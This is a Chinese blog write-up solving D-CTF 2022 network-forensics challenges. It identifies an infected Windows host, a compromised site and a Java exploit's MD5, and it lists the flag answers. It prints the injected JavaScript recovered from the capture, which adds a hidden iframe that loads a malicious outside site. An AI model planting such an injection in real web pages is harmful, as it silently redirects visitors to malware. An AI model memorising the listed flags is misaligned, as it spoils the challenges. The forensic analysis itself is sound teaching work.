D-CTF 2022部分题目Writeup

本文最后更新于:2022年9月30日 晚上

战况

截止我两摆烂之前,是24名。
image

Writeup

network-traffic1

What is the the ip address of the infected Windows? 受感染的Windows的ip地址是多少?

前11个包IP都是172.16.165.165,从第12个开始变换,所以变换之前的就是Windows的ip地址

image

172.16.165.165

What is the hostname value for the computer that gets infected? Flag format: uppercase only 被感染的计算机的主机名值是多少?标志格式:仅大写

过滤出DHCP包,随便一个都能直接看出

image

K34EN6W3N-PC

What is the name of the compromised web site, basically the entry point of the malware infection?被入侵的网站叫什么名字,基本上是恶意软件感染的切入点?

这道题是我最开始做的题,进去了先把这个题做出了,再做的其他题

133包里,可以看到,这个人他使用了必应搜了东西ciniholland.nl

image

然后我就直接加了 http:// 和 后缀 提交就正确了,至于正确的做法我也不知道。

http://ciniholland.nl/

Please provide the redirection URL that is used by the malware after being injected into the compromised machine. Flag format: full URL 请提供恶意软件注入受感染机器后使用的重定向URL。标志格式:完整URL

因为已经知道被入侵的网站是ciniholland.nl 所以直接过滤,在找到161包的时候,发现了重定向代码

image

1
2
3
4
5
6
7
8
9
10
11
12
function showBrowVer()
{
var divTag=document.createElement('div');
divTag.id='dt';
document.body.appendChild(divTag);
var js_kod2 = document.createElement('iframe');
js_kod2.src = 'http://24corp-shop.com';
js_kod2.width = '180px';
js_kod2.height = '200px';
js_kod2.setAttribute('style','visibility:hidden');
document.getElementById('dt').appendChild(js_kod2);
}

http://24corp-shop.com

What is the MD5 for the Java exploit used în this attack ? 这次攻击中使用的Java攻击的MD5是什么?

在导出的文件中,我用D盾没有扫出东西,用火绒扫出了4个,然后就计算这四个的md5,结果都不是

image

然后用微步沙盒扫了一下,发现是文件名为index.php%3freq=jar&num=3703&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM的文件,然后计算md5,提交就行

image

1e34fdebbf655cebea78b45e43520ddf

network-traffic2

Please determine when the malicious activity started. Flag format: DD-MM-YYYY 请确定恶意活动何时开始。标志格式:DD-MM-YYYY

这个题确实挺简单的,直接随便选一个看时间就行,因为他们都是同一天的

image

13-02-2018

Determine the IP address of the affected Windows host. 确定受影响的Windows主机的IP地址。

还是和上个题差不多的,流量包里面就10.23.1.710.23.1.205最多,两个都提交试一下就行

10.23.1.205

Determine the hostname of the afected Windows machine. Flag format: uppercase only 确定受影响的Windows机器的主机名。标志格式:仅大写

这两个流量分析其实都差不多,和上个题的方式一样,过滤DHCP就行

iamge

Reginald-PC

总结

国外的CTF比赛确实很活,题目都出的比较贴近实际,不像国内的CTF取证题,给你放个flag让你找,真想不通出这种题的人到底会不会取证?


D-CTF 2022部分题目Writeup
https://blog.didctf.com/2022/09/30/D-CTF2022/
作者
DIDCTF
发布于
2022年9月30日
更新于
2022年9月30日
许可协议